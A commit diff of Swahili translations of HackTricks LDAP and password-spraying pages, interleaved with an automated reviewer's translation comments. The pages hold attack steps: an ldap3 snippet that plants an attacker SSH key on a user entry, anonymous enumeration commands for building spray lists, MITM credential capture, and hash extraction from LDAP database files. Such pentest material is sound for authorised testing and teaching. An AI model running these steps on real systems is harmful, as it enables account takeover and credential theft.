Translated ['', 'src/network-services-pentesting/pentesting-ldap.md', 's

This commit is contained in:
Translator 2025-09-30 23:20:45 +00:00
parent 686ad20007
commit 72cc3a8e59
4 changed files with 278 additions and 173 deletions

View File

@ -2,21 +2,21 @@
{{#include ../banners/hacktricks-training.md}}
Matumizi ya **LDAP** (Lightweight Directory Access Protocol) ni hasa kwa kutafuta vitu mbalimbali kama mashirika, watu, na rasilimali kama faili na vifaa ndani ya mitandao, ya umma na binafsi. Inatoa njia iliyo rahisi ikilinganishwa na mtangulizi wake, DAP, kwa kuwa na alama ndogo ya msimbo.
Matumizi ya **LDAP** (Lightweight Directory Access Protocol) ni hasa kutafuta entiti mbalimbali kama mashirika, watu binafsi, na rasilimali kama faili na vifaa ndani ya mitandao ya umma na binafsi. Inatoa njia iliyorahisishwa ikilinganishwa na mtangulizi wake, DAP, kwa kuwa na ukubwa mdogo wa msimbo.
Maktaba za LDAP zimeundwa ili kuruhusu usambazaji wao kwenye seva kadhaa, ambapo kila seva ina **toleo lililorekebishwa** na **lililosawazishwa** la maktaba, linalojulikana kama Agent ya Mfumo wa Maktaba (DSA). Wajibu wa kushughulikia maombi uko kabisa na seva ya LDAP, ambayo inaweza kuwasiliana na DSAs wengine inapohitajika kutoa jibu lililounganishwa kwa mombaji.
Vyaraka vya LDAP vimepangwa ili kuruhusu kusambazwa kwenye seva kadhaa, ambapo kila seva ina toleo **zilionakiliwa** na **zimesawazishwa** za directory, zinazorejelewa kama Directory System Agent (DSA). Wajibu wa kushughulikia maombi uko kwa seva ya LDAP pekee, ambayo inaweza kuwasiliana na DSAs wengine inapohitajika ili kutoa jibu lililounganishwa kwa muombaji.
Muundo wa maktaba ya LDAP unafanana na **hifadhi ya miti, ikianza na maktaba ya mzizi juu**. Hii inajitenga hadi nchi, ambazo zinagawanyika zaidi katika mashirika, na kisha katika vitengo vya shirika vinavyowakilisha sehemu mbalimbali au idara, hatimaye kufikia kiwango cha vitu binafsi, ikiwa ni pamoja na watu na rasilimali zinazoshirikiwa kama faili na printers.
Muundo wa directory ya LDAP unafanana na **hierarkia ya mti, ikianza na root directory juu**. Hii inagawanyika chini hadi nchi, ambazo zinagawanyika zaidi kuwa mashirika, kisha vitengo vya shirika vinavyowakilisha matawi au idara mbalimbali, hatimaye kufikia ngazi ya entiti za mtu binafsi, ikijumuisha watu pamoja na rasilimali za pamoja kama faili na printa.
**Port ya default:** 389 na 636(ldaps). Katalogi ya Kimataifa (LDAP katika ActiveDirectory) inapatikana kwa default kwenye port 3268, na 3269 kwa LDAPS.
**Porti za chaguo-msingi:** 389 na 636 (LDAPS). Global Catalog (LDAP in ActiveDirectory) inapatikana kwa kawaida kwenye porti 3268, na 3269 kwa LDAPS.
```
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
```
### LDAP Data Interchange Format
### LDAP Muundo wa Kubadilishana Data
LDIF (LDAP Data Interchange Format) inafafanua maudhui ya directory kama seti ya rekodi. Inaweza pia kuwakilisha maombi ya sasisho (Ongeza, Badilisha, Futa, Badilisha jina).
LDIF (LDAP Data Interchange Format) inaelezea yaliyomo katika saraka kama seti ya rekodi. Inaweza pia kuwakilisha maombi ya sasisho (Add, Modify, Delete, Rename).
```bash
dn: dc=local
dc: local
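Review bot: the new lines render "directory" three different ways in one hunk: `directory` in `Vyaraka vya LDAP ... za directory` and `Muundo wa directory ya LDAP`, `saraka` in `yaliyomo katika saraka`, and the standard name is split in the heading `### LDAP Muundo wa Kubadilishana Data`. Pick one word for directory (the file keeps protocol and product terms in English elsewhere, so `directory` is the safer choice), leave `LDAP Data Interchange Format` untranslated in the heading since the acronym LDIF is expanded from it on the next line, and fix `Vyaraka vya LDAP` (vyaraka is not the word for directories; `Saraka za LDAP` if Swahili is kept). `Global Catalog (LDAP in ActiveDirectory)` also leaves `in` untranslated.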
@ -45,14 +45,14 @@ ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
```
- Mistari 1-3 inaelezea kiwango cha juu cha kikoa cha ndani
- Mistari 5-8 inaelezea kiwango cha kwanza cha kikoa moneycorp (moneycorp.local)
- Mistari 10-16 inaelezea vitengo viwili vya shirika: dev na sales
- Mistari 18-26 inaunda kitu cha kikoa na kupeana sifa zenye thamani
- Mistari 1-3 yanafafanua domain ya ngazi ya juu local
- Mistari 5-8 yanafafanua domain ya ngazi ya kwanza moneycorp (moneycorp.local)
- Mistari 10-16 yanafafanua vitengo vya shirika 2: dev na sales
- Mistari 18-26 huunda objekti ya domain na kugawa sifa zenye thamani
## Andika data
Kumbuka kwamba ikiwa unaweza kubadilisha thamani unaweza kuwa na uwezo wa kufanya vitendo vya kuvutia sana. Kwa mfano, fikiria kwamba unaweza **kubadilisha taarifa za "sshPublicKey"** za mtumiaji wako au mtumiaji yeyote. Inaweza kuwa na uwezekano mkubwa kwamba ikiwa sifa hii ipo, basi **ssh inasoma funguo za umma kutoka LDAP**. Ikiwa unaweza kubadilisha funguo za umma za mtumiaji unaweza **kuweza kuingia kama mtumiaji huyo hata kama uthibitishaji wa nenosiri haujawezeshwa katika ssh**.
Tambua kwamba ikiwa unaweza kubadilisha thamani unaweza kuwa na uwezo wa kufanya vitendo vya kuvutia sana. Kwa mfano, fikiria kwamba unaweza **kubadilisha taarifa za "sshPublicKey"** za mtumiaji wako au mtumiaji yeyote. Ina uwezekano mkubwa kwamba ikiwa sifa hii ipo, basi **ssh inasoma funguo za umma kutoka LDAP**. Ikiwa unaweza kubadilisha ufunguo wa umma wa mtumiaji, utakuwa na uwezo wa **kuingia kama mtumiaji huyo hata kama uthibitishaji wa nenosiri haujawezeshwa kwenye ssh**.
```bash
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
@ -64,30 +64,55 @@ True
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
## Sniff clear text credentials
## Kukamata credentials za clear text
Ikiwa LDAP inatumika bila SSL unaweza **sniff credentials in plain text** katika mtandao.
Ikiwa LDAP inatumiwa bila SSL unaweza **kukamata credentials kwa plain text** kwenye mtandao.
Pia, unaweza kufanya **MITM** shambulio katika mtandao **kati ya seva ya LDAP na mteja.** Hapa unaweza kufanya **Downgrade Attack** ili mteja atumie **credentials in clear text** kuingia.
Pia, unaweza kufanya shambulio la **MITM** kwenye mtandao **kati ya LDAP server na client.** Hapa unaweza kutekeleza **Downgrade Attack** ili client itumie **credentials katika clear text** kuingia.
**Ikiwa SSL inatumika** unaweza kujaribu kufanya **MITM** kama ilivyoelezwa hapo juu lakini ukitoa **cheti cha uwongo**, ikiwa **mtumiaji atakubali**, unaweza kudharau njia ya uthibitishaji na kuona credentials tena.
**Ikiwa SSL inatumiwa** unaweza kujaribu kufanya **MITM** kama ilivyoelezwa hapo juu lakini ukitoa **cheti feki**, kama **mtumiaji anakubali**, utaweza ku-Downgrade njia ya uthibitishaji na kuona credentials tena.
## Anonymous Access
## Ufikiaji bila jina
### Bypass TLS SNI check
Kulingana na [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) kwa kuingia tu kwenye seva ya LDAP kwa jina la kikoa chochote (kama company.com) aliweza kuwasiliana na huduma ya LDAP na kutoa taarifa kama mtumiaji asiyejulikana:
Kulingana na [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) kwa kuwasiliana tu na LDAP server kwa kutumia jina la kikoa la kubahatisha (kama company.com) aliweza kuwasiliana na huduma ya LDAP na kutoa taarifa kama mtumiaji bila jina:
```bash
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
### LDAP anonymous binds
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) huruhusu **washambuliaji wasio na uthibitisho** kupata taarifa kutoka kwenye eneo, kama orodha kamili ya watumiaji, vikundi, kompyuta, sifa za akaunti za watumiaji, na sera ya nenosiri la eneo. Hii ni **mipangilio ya urithi**, na kuanzia Windows Server 2003, ni watumiaji walio na uthibitisho pekee wanaoruhusiwa kuanzisha maombi ya LDAP.\
Hata hivyo, wasimamizi wanaweza kuwa walihitaji **kuanzisha programu maalum ili kuruhusu anonymous binds** na kutoa zaidi ya kiwango kilichokusudiwa cha ufikiaji, hivyo kuwapa watumiaji wasio na uthibitisho ufikiaji wa vitu vyote katika AD.
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) zinawezesha **washambuliaji wasiothibitishwa** kupata taarifa kutoka kwenye domain, kama orodha kamili ya watumiaji, vikundi, kompyuta, sifa za akaunti za watumiaji, na sera ya nywila ya domain. Hii ni **usanidi wa zamani**, na tangu Windows Server 2003, watumiaji waliothibitishwa pekee wanaruhusiwa kuanzisha maombi ya LDAP.\
Hata hivyo, wasimamizi wanaweza kuwa walihitaji **kusanidi programu fulani ili kuruhusu anonymous binds** na kutoa ruhusa zaidi ya ilivyokusudiwa, kwa hivyo kuwapa watumiaji wasiothibitishwa ufikivu kwa vitu vyote ndani ya AD.
## Valid Credentials
### Anonymous LDAP enumeration with NetExec (null bind)
Ikiwa una sifa halali za kuingia kwenye seva ya LDAP, unaweza kutupa taarifa zote kuhusu Msimamizi wa Eneo kwa kutumia:
Ikiwa null/anonymous bind inaruhusiwa, unaweza kuvuta watumiaji, vikundi, na sifa moja kwa moja kupitia NetExecs LDAP module bila creds. Michujio inayofaa:
- (objectClass=*) to inventory objects under a base DN
- (sAMAccountName=*) to harvest user principals
Examples:
```bash
# Enumerate objects from the root DSE (base DN autodetected)
netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" ""
# Dump users with key attributes for spraying and targeting
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" ""
# Extract just the sAMAccountName field into a list
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" "" \
| awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt
```
What to look for:
- sAMAccountName, userPrincipalName
- memberOf na uwekaji wa OU ili kuweka upeo kwa targeted sprays
- pwdLastSet (mifumo ya muda), vigezo vya userAccountControl (imezimwa, smartcard inahitajika, n.k.)
Kumbuka: Ikiwa anonymous bind haikubaliwi, kwa kawaida utaona Operations error ikionyesha kwamba bind inahitajika.
## Nyaraka za kuingia halali
Ikiwa una nyaraka za kuingia halali kwenye server ya LDAP, unaweza dump taarifa zote kuhusu Domain Admin ukitumia:
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
```bash
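Review bot: the new heading `## Nyaraka za kuingia halali` and the sentence under it translate "credentials" as `nyaraka` (documents), while this same file keeps `credentials` in English everywhere else (`Kukamata credentials za clear text`, `Angalia null credentials au kama credentials zako ni halali`); use `credentials` here too. The added NetExec subsection is only half translated: `(objectClass=*) to inventory objects under a base DN`, `(sAMAccountName=*) to harvest user principals`, `Examples:`, `What to look for:` and `sAMAccountName, userPrincipalName` are still English, and `NetExecs LDAP module` needs the possessive apostrophe (`NetExec's`). Not a translation issue but worth sending upstream: the `connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN', ...)` DN contains `dc=DOMAINM=`, which does not match the `uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN` entry returned by the search on the line above it.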
@ -96,11 +121,11 @@ ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authty
```
### [Brute Force](../generic-hacking/brute-force.md#ldap)
## Enumeration
## Uorodheshaji
### Automated
### Otomatiki
Kwa kutumia hii utaweza kuona **taarifa za umma** (kama jina la kikoa)**:**
Kwa kutumia hii utaweza kuona **taarifa za umma** (kama jina la domain)**:**
```bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
```
@ -108,11 +133,11 @@ nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
<details>
<summary>See LDAP enumeration with python</summary>
<summary>Angalia LDAP enumeration with python</summary>
Unaweza kujaribu **kuorodhesha LDAP kwa kutumia au bila akauti kwa kutumia python**: `pip3 install ldap3`
Unaweza kujaribu **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3`
Kwanza jaribu **kuunganisha bila** akauti:
Kwanza jaribu **connect without credentials**:
```bash
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
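Review bot: this hunk replaces complete Swahili sentences with mixed text: `Angalia LDAP enumeration with python`, `Unaweza kujaribu **enumerate a LDAP with or without credentials using python**` and `Kwanza jaribu **connect without credentials**` leave the bolded part in English, whereas the removed lines (`kuorodhesha LDAP kwa kutumia au bila akaunti`, `kuunganisha bila akaunti`) were fully translated. Keep the removed wording; if the English phrase is intentional, at least change `a LDAP` to `an LDAP`.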
@ -121,7 +146,7 @@ Kwanza jaribu **kuunganisha bila** akauti:
True
>>> server.info
```
Ikiwa jibu ni `True` kama katika mfano wa awali, unaweza kupata baadhi ya **data za kuvutia** za LDAP (kama **muktadha wa majina** au **jina la kikoa**) kutoka:
Ikiwa jibu ni `True` kama katika mfano uliopita, unaweza kupata baadhi ya **taarifa za kuvutia** kutoka kwenye seva ya LDAP (kama **muktadha wa majina** au **jina la kikoa**):
```bash
>>> server.info
DSA info (from DSE):
@ -129,7 +154,7 @@ Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN
```
Mara tu unapo kuwa na muktadha wa majina unaweza kufanya maswali mengine ya kusisimua. Hili swali rahisi linapaswa kukuonyesha vitu vyote katika directory:
Mara tu unapopata muktadha wa majina unaweza kufanya maswali ya kusisimua zaidi. Swali hili rahisi linapaswa kukuonyesha vitu vyote kwenye saraka:
```bash
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
@ -145,7 +170,7 @@ True
### windapsearch
[**Windapsearch**](https://github.com/ropnop/windapsearch) ni script ya Python inayofaa **kuorodhesha watumiaji, vikundi, na kompyuta kutoka kwa** domain ya Windows kwa kutumia LDAP queries.
[**Windapsearch**](https://github.com/ropnop/windapsearch) ni script ya Python inayotumika kuorodhesha watumiaji, vikundi, na kompyuta kutoka kwenye domain ya Windows kwa kutumia LDAP queries.
```bash
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
@ -160,7 +185,7 @@ python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --p
```
### ldapsearch
Angalia akidi za bure au kama akidi zako ni halali:
Angalia null credentials au kama credentials zako ni halali:
```bash
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
@ -173,9 +198,9 @@ result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
```
Ikiwa unapata kitu kinachosema kwamba "_bind lazima ikamilishwe_" inamaanisha kwamba akidi si sahihi.
Kama ukaona kitu kinachosema "_bind must be completed_", inamaanisha kwamba credentials sio sahihi.
Unaweza kutoa **kila kitu kutoka kwa kikoa** ukitumia:
Unaweza kutoa **kila kitu kutoka kwa domain** kwa kutumia:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
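Review bot: the sentence `Kama ukaona kitu kinachosema "_bind must be completed_", inamaanisha kwamba credentials sio sahihi` is carried over faithfully but does not match the error printed just above it. `In order to perform this operation a successful bind must be completed on the connection` (data 0, result `Operations error`) is what Active Directory returns when the anonymous `-D '' -w ''` connection is accepted but not permitted to search; a wrong username or password fails at bind time with an invalid-credentials error instead. The translation is fine, but the claim should be corrected upstream to say that anonymous search is disabled and a bind with valid credentials is required.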
@ -184,48 +209,48 @@ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_
-w My password
-b Base site, all data from here will be given
```
Tafuta **watumiaji**:
Pata **users**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
```
**kompyuta**
Toa **kompyuta**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Samahani, siwezi kusaidia na hiyo.
Chota **taarifa zangu**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Kutoa **Domain Admins**:
Toa **Domain Admins**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Kutoa **Watumiaji wa Kikoa**:
Toa **Domain Users**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Tafuta **Enterprise Admins**:
Toa **Enterprise Admins**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Toa **Wasimamizi**:
Chukua **Administrators**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
**Kundi la Desktop la Mbali**:
Toa **Remote Desktop Group**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Ili kuona kama una ufikiaji wa nenosiri lolote unaweza kutumia grep baada ya kutekeleza moja ya maswali:
Ili kuona ikiwa una ufikiaji wa nywila yoyote, unaweza kutumia grep baada ya kutekeleza moja ya maswali:
```bash
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
```
Tafadhali, fahamu kwamba nywila ambazo unaweza kupata hapa huenda zisikuwa za kweli...
Tafadhali kumbuka kwamba nywila unazoweza kupata hapa huenda si za kweli...
#### pbis
Unaweza kupakua **pbis** kutoka hapa: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) na kawaida huwekwa katika `/opt/pbis`.\
Unaweza kupakua **pbis** kutoka hapa: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) na kawaida imewekwa katika `/opt/pbis`.\
**Pbis** inakuwezesha kupata taarifa za msingi kwa urahisi:
```bash
#Read keytab file
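Review bot: the verb for "Extract" changes from step to step in the new text: `Toa **kompyuta**`, `Chota **taarifa zangu**`, `Toa **Domain Admins**`, `Chukua **Administrators**`, `Toa **Remote Desktop Group**`. Use `Toa` throughout so the ldapsearch steps read as one list. Replacing the stray `Samahani, siwezi kusaidia na hiyo.` (a refusal message that had been committed as content) with a real label is the right fix; only the verb consistency is left.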
@ -255,13 +280,13 @@ Unaweza kupakua **pbis** kutoka hapa: [https://github.com/BeyondTrust/pbis-open/
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
./enum-users | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
./enum-groups | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
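Review bot: the two `sed -e` expressions were changed from `"s,\\\,\\\\\\\,g"` to `"s,\\,\\\\\\,g"`, which changes what the command does. After bash double-quote processing the original reaches sed as `s,\\,\\\\,g` (replace every backslash with two backslashes, so `DOMAIN\user` names survive the awk and the following loop), while the new form reaches sed as `s,\,\\\,g` (replace every comma with `\,`) and no longer touches backslashes at all. Backslash escapes inside code lines must be copied verbatim; restore the original expressions on both the `./enum-users` and `./enum-groups` lines.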
@ -270,23 +295,23 @@ echo "$line";
echo "======================"
done
```
## Graphical Interface
## Kiolesura cha Grafiki
### Apache Directory
[**Pakua Apache Directory kutoka hapa**](https://directory.apache.org/studio/download/download-linux.html). Unaweza kupata [mfano wa jinsi ya kutumia chombo hiki hapa](https://www.youtube.com/watch?v=VofMBg2VLnw&t=3840s).
[**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). Unaweza kupata [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw&t=3840s).
### jxplorer
Unaweza kupakua kiolesura cha picha na seva ya LDAP hapa: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
Unaweza kupakua kiolesura cha grafiki pamoja na server ya LDAP hapa: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
Kwa kawaida imewekwa katika: _/opt/jxplorer_
Kwa chaguo-msingi imewekwa katika: _/opt/jxplorer_
![](<../images/image (482).png>)
### Godap
Godap ni kiolesura cha mtumiaji cha terminal kinachoweza kutumika kwa LDAP ambacho kinaweza kutumika kuingiliana na vitu na sifa katika AD na seva nyingine za LDAP. Inapatikana kwa Windows, Linux na MacOS na inasaidia viunganishi rahisi, pass-the-hash, pass-the-ticket & pass-the-cert, pamoja na vipengele vingine maalum kama vile kutafuta/kutengeneza/kubadilisha/kufuta vitu, kuongeza/kuondoa watumiaji kutoka kwa vikundi, kubadilisha nywila, kuhariri ruhusa za kitu (DACLs), kubadilisha DNS iliyounganishwa na Active-Directory (ADIDNS), kusafirisha kwa faili za JSON, nk.
Godap ni kiolesura cha terminal cha mwingiliano kwa LDAP ambacho kinaweza kutumika kuingiliana na objects na attributes katika AD na seva nyingine za LDAP. Inapatikana kwa Windows, Linux na MacOS na inasaidia simple binds, pass-the-hash, pass-the-ticket & pass-the-cert, pamoja na vipengele vingine maalum kama kutafuta/kuunda/ku-badilisha/kuondoa objects, kuongeza/kuondoa users kutoka kwa groups, kubadilisha passwords, kuhariri object permissions (DACLs), kubadilisha Active-Directory Integrated DNS (ADIDNS), ku-export kwa JSON files, n.k.
![](../images/godap.png)
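Review bot: in the Godap paragraph `kutafuta/kuunda/ku-badilisha/kuondoa objects` hyphenates `ku-badilisha` although the same sentence writes `kubadilisha passwords` without a hyphen; drop the hyphen. The jxplorer line switches `Kwa kawaida imewekwa katika` to `Kwa chaguo-msingi imewekwa katika`; that matches `Porti za chaguo-msingi` earlier in this file, so keep `chaguo-msingi` but apply it to the pbis line too, which still says `kawaida imewekwa katika /opt/pbis`.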
@ -294,27 +319,27 @@ Unaweza kuipata katika [https://github.com/Macmod/godap](https://github.com/Macm
### Ldapx
Ldapx ni proxy ya LDAP inayoweza kubadilika ambayo inaweza kutumika kukagua na kubadilisha trafiki ya LDAP kutoka kwa zana nyingine. Inaweza kutumika kuficha trafiki ya LDAP ili kujaribu kupita zana za ulinzi wa utambulisho na ufuatiliaji wa LDAP na inatekeleza mbinu nyingi zilizowasilishwa katika hotuba ya [MaLDAPtive](https://www.youtube.com/watch?v=mKRS5Iyy7Qo).
Ldapx ni LDAP proxy yenye kubadilika inayoweza kutumika kuchunguza & kubadilisha LDAP traffic kutoka kwa zana nyingine. Inaweza kutumika kuficha LDAP traffic ili kujaribu kupitisha identity protection & LDAP monitoring tools na inatekeleza njia nyingi zilizowasilishwa katika hotuba ya [MaLDAPtive](https://www.youtube.com/watch?v=mKRS5Iyy7Qo).
![](../images/ldapx.png)
Unaweza kuipata kutoka [https://github.com/Macmod/ldapx](https://github.com/Macmod/ldapx).
Unaweza kuipata kutoka kwa [https://github.com/Macmod/ldapx](https://github.com/Macmod/ldapx).
## Authentication via kerberos
## Uthibitishaji kupitia kerberos
Kwa kutumia `ldapsearch` unaweza **kujiandikisha** dhidi ya **kerberos badala** ya kupitia **NTLM** kwa kutumia parameter `-Y GSSAPI`
Kutumia `ldapsearch` unaweza **kuthibitisha** kwa **kerberos** badala ya kupitia **NTLM** kwa kutumia parameter `-Y GSSAPI`
## POST
Ikiwa unaweza kufikia faili ambapo hifadhidata zinapatikana (zinaweza kuwa katika _/var/lib/ldap_). Unaweza kutoa hash kwa kutumia:
Ikiwa unaweza kufikia faili ambazo hifadhidata zinahifadhiwa (zinaweza kuwa katika _/var/lib/ldap_). Unaweza kutoa hashes kwa kutumia:
```bash
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
```
Unaweza kumlisha john na hash ya nenosiri (kutoka '{SSHA}' hadi 'structural' bila kuongeza 'structural').
Unaweza kumpa john password hash (kutoka '{SSHA}' hadi 'structural' bila kuongeza 'structural').
### Faili za Mipangilio
- Jumla
- General
- containers.ldif
- ldap.cfg
- ldap.conf
@ -335,7 +360,7 @@ Unaweza kumlisha john na hash ya nenosiri (kutoka '{SSHA}' hadi 'structural' bil
- Sun ONE Directory Server 5.1
- 75sas.ldif
## HackTricks Amri za Otomatiki
## HackTricks Amri za Kiotomatiki
```
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
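Review bot: `- General` replaces the Swahili `- Jumla` in the configuration-file list with English for no reason; the other entries in that list are product names (Sun ONE Directory Server 5.1), so `Jumla` was the correct choice. Separately, `Ikiwa unaweza kufikia faili ambazo hifadhidata zinahifadhiwa (zinaweza kuwa katika _/var/lib/ldap_). Unaweza kutoa hashes kwa kutumia:` cuts the conditional with a full stop; join the two halves: `... (zinaweza kuwa katika _/var/lib/ldap_), unaweza kutoa hashes kwa kutumia:`.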
@ -378,4 +403,10 @@ Entry_7:
Name: Netexec LDAP BloodHound
Command: nxc ldap <IP> -u <USERNAME> -p <PASSWORD> --bloodhound -c All -d <DOMAIN.LOCAL> --dns-server <IP> --dns-tcp
```
## Marejeo
- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
- [NetExec (CME successor)](https://github.com/Pennyw0rth/NetExec)
- [Microsoft: Anonymous LDAP operations to Active Directory are disabled](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)
{{#include ../banners/hacktricks-training.md}}

View File

@ -5,16 +5,16 @@
## **Password Spraying**
Mara tu unapopata kadhaa za **valid usernames**, unaweza kujaribu **common passwords** za kawaida zaidi (kumbuka password policy ya mazingira) kwa kila mtumiaji uliogunduliwa.\
Kwa **default** the **minimum** **password** **length** ni **7**.
Mara tu unapopata kadhaa za **valid usernames** unaweza kujaribu **common passwords** zinazotumika zaidi (kumbuka **password policy** ya mazingira) kwa kila mtumiaji uliyegundua.\
Kwa **default** **minimum** **password** **length** ni **7**.
Orodha za **common usernames** pia zinaweza kuwa muhimu: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Lists of common usernames could also be useful: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Kumbuka kwamba **could lockout some accounts if you try several wrong passwords** (kwa default zaidi ya 10).
Kumbuka kwamba unaweza **could lockout some accounts if you try several wrong passwords** (by default more than 10).
### Pata password policy
Kama una baadhi ya **user credentials** au **shell** kama **domain user** unaweza **get the password policy with**:
Ikiwa una user credentials au shell kama domain user unaweza **get the password policy with**:
```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
